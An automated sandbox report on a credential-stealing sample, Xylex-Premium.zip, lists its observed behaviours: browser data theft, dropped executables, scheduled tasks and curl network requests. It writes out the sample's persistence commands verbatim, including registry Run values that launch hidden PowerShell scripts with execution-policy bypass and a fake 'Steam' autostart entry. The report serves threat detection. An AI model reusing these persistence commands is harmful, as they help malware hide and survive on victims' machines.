Malware Analysis Report

2024-11-30 07:15

Sample ID 240603-hffcgsfa7t
Target Xylex-Premium.zip
SHA256 bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f
Tags
execution persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f

Threat Level: Known bad

The file Xylex-Premium.zip was found to be: Known bad.

Malicious Activity Summary

execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Launches sc.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Enumerates processes with tasklist

Modifies registry key

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Detects videocard installed

Checks processor information in registry

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 06:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 06:40

Reported

2024-06-03 06:51

Platform

win11-20240426-en

Max time kernel

678s

Max time network

679s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\vsPkDgRTpOrbGuB.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\gJcMjZkbpUPtLad.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" C:\Windows\system32\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\Notepad.exe N/A
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4088 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
PID 5088 wrote to memory of 2640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
PID 2640 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\curl.exe
PID 2640 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\curl.exe
